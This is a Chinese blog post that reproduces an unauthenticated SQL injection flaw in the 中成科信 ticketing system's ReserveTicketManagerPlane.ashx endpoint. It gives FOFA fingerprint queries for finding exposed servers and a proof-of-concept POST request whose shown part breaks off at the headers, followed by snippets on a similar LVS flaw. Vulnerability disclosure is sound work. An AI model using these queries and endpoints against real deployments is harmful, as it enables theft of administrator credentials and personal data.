首页 > 数据库 >中成科信票务管理系统 ReserveTicketManagerPlane.ashx SQL注入漏洞复现

中成科信票务管理系统 ReserveTicketManagerPlane.ashx SQL注入漏洞复现

时间:2024-05-29 16:33:36浏览次数:17  
标签:ReserveTicketManagerPlane zh 检票 科信 漏洞 ashx 复现 票务 防伪

0x01 产品简介

中成科信票务管理系统是专注于演出剧院、体育场馆、旅游景区、游乐园、场地活动的票务管理系统,并为特殊客户量身定制票务应用解决方案,可根据用户的要求采用不同的技术载体实现门票的防伪:二维条码门票防伪技术、RFID电子门票防伪技术、手机二维码门票技术、变温微缩文字荧光等防伪票纸技术。根据票务系统应用环境的不同,系统的检票环节可定制为全自动闸机检票、手持终端机检票、无色荧光检测器等检票方式,也可多种方式并存。

0x02 漏洞概述

中成科信票务管理系统 ReserveTicketManagerPlane.ashx 接口处存在SQL注入漏洞复现,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。

0x03 复现环境

FOFA:

icon_hash="1632964065" || icon_hash="-2142050529"

0x04 漏洞复现

PoC

POST /SystemManager/Planetarium/ReserveTicketManagerPlane.ashx HTTP/1.1
Host: your-ip
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requ

标签:ReserveTicketManagerPlane,zh,检票,科信,漏洞,ashx,复现,票务,防伪
From: https://blog.csdn.net/qq_41904294/article/details/139298699

相关文章

  • LVS精益价值管理系统LVS.Web.ashx存在SQL注入漏洞
    漏洞描述LVS.web.AgencytaskList,LVS.web.ashx文件的GetColumnIndex方法卫队gridid参数进行充分的验证和转义,导致SQL注入。攻击者通过发送特制的POST请求,可以向数据库发送恶意的SQL语句,从而泄露数据库信息或执行任意SQL命令。fofabody="/ajax/LVS.Core.Common.STSResult,LVS.Co......
  • ashx获取请求体
    publicvoidProcessRequest(HttpContextcontext){context.Response.ContentType="text/plain";try{stringaction=context.Request.QueryString["action"];if(!string.IsNullOrEmpty(action)){......
  • ashx部署到iis访问不了
    公司的老项目部署到IIS报一堆错误:一、Noesis.Javascript报错,忘记截图了,这是因为这个组件是32位的,iis必须开启32位二、访问http://domain/xxx.ashx无响应1.看这几个有没有设置2.查看MIME类型是否设置.ashx,如果碰到无法写入web.config的问题,检查web.config权限,如果权限设置eve......
  • ashx中报错: 对象为null
    问题点:.ashx中报错对象为null. 现状代码:.aspx中 varDBID被定义了两次。 修改后: ......
  • asp.net中*.ashx文件的用法
    1首先添加一个ashx文件!开始:通过这几个步骤你可以添加一个新的ashx文件:打开你的ASP.NETwebsite;右击项目选择“AddNewItem...”;将显示一个“AddNewItem”的对话框,选择“GenericHandler”。此时,你就会得到一个新的ashx文件。2.自动生成代码我们需要注意的是在ashx文件中......
  • visual studio在运行ashx文件时 出现 Failed to load resource: the server responde
     报错详细信息如下“/”应用程序中的服务器错误。分析器错误说明: 在分析向此请求提供服务所需资源时出错。请检查下列特定分析错误详细信息并适当地修改源文件。分析器错误消息: 未能创建类型“WebApp.FileUploadHandler”。源错误:行1:<%@WebHandlerLanguage=......
  • MacOS 苹果笔记本使用ClashX下载安装配置教程
    一、ClashX简介ClashX是运行在macOS上的一款科学上网工具。支持的协议: Vmess,Shadowsocks,Snell,SOCKS5,ClashX现已支持SSR协议。ClashX可随时切换代理模式及节......
  • vs2015编写ashx时双重缩进(解决:选项 -> 文本编辑器 -> C# -> 制表符 -> 缩进 改为: 块)
    不知道是否有人遇到此问题,但在VS2015(社区)编辑ASHX文件时,文本编辑器会在输入时双重缩进。几乎就像它预计一切都已经缩进了一样。智能格式化修复了这个问题,但是编写看起来不......
  • 做了MVC模式一年,可不要把传统模式忘记呀!ashx配合aspx实现AJAX加载JSON数据
    ASHX内容:#regionIHttpHandlerMemberspublicvoidProcessRequest(HttpContextcontext){context.Response.ContentType="application/x......